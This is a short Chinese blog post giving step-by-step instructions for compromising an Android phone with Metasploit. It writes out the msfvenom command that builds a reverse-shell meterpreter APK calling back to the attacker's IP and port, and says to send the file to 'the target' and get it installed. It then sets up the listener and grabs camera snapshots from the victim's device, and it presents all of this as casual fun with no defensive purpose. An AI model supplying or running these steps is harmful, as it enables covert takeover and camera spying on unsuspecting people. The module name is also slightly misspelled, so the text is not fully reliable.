MSF入侵安卓手机,

 最近本姑娘闲来无事玩了玩kali ,发现了msf的开启摄像头功能,吓得本姑娘以后在也不敢在睡觉前玩手机了。

 以下是步骤:

1、打开电脑,我用的是kali虚拟机做测试,当然用服务器操作亦然相同

 查看ip,假设是192.168.1.1


2、在kali里面生成文件,生成的是一个apk.apk的安装文件,路径在root目录下,复制该文件,发送给目标

命令为:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

3、手机上安装apk.apk文件,然后桌面上显示main activity

4、打开msf:

1. use exploit/multi/handler 加载模块

2.set payload android/meterpreter/reverse_tcp 选择Payload

3.show options 查看参数设置



5、设置自己网络ip以及端口,手机点击病毒,即可抓取摄像头:



6、获得截图,截图保存在root文件夹下

webscam_snap -i 1:外置摄像头;2:内置摄像头


MSF入侵安卓手机,_第1张图片



你可能感兴趣的:(关于漏洞)